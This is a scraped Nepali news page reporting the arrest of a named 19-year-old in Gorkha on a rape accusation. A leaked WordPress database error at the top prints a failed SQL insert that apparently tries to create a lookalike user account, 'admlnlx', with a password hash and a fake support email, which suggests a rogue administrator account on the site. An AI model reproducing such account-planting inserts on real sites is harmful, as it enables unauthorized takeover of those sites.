WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BkyikmuSf8Phm/eQqzUxeMFMTc0pvm1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-02 02:40:58', '', 'admlnlx', 'admlnlx')
गोरखा,माघ ४-
जबरजस्ती करणी गरी फरार रहेको आरोपमा लागेका एक युवकलाई प्रहरीले पक्राउ गरेको छ । गोरखा जिल्लाको बोर्लाङ गा.वि.स वडा नम्बर ६ का १९ बाषिर्या रवी पौडेललाई प्रहरीले पक्राउ गरेको जिल्ला प्रहरी कार्यालय गोरखाका प्रहरी नायव उपरिक्षक बिरेन्द्र थापाले जानकारी दिनुभयो । आफुलाई जबरजस्ती करणी गरेको भन्दै बोर्लाङ गा.वि.सकी पिडित महिलाले पौडल माथी मुद्दा दर्ता गरेकी थिइन ।
जबरजस्ती करणी मुद्दा दर्ता भएपछि फरार रहेका पौडेललाई जिल्ला प्रहरी कार्यालय गोरखाबाट खटिएका प्रहरी टोलीले आईतबार काठमाडौको नयाँबसपार्कबाट पक्राउ गरेको हो । पक्राउ परेका पौडललाई सोमबार जिल्ला अदालत गोरखामा पेश गरिएकोमा अदालतले पुर्पक्षको लागी थुनामा पठाउन आदेश दिएको थियो । अदालतको आदेश अनुसार पौडेललाई सोमबार नै पुर्पक्षका लागि थुनामा पठाइएको प्रहरीले जनाएको छ ।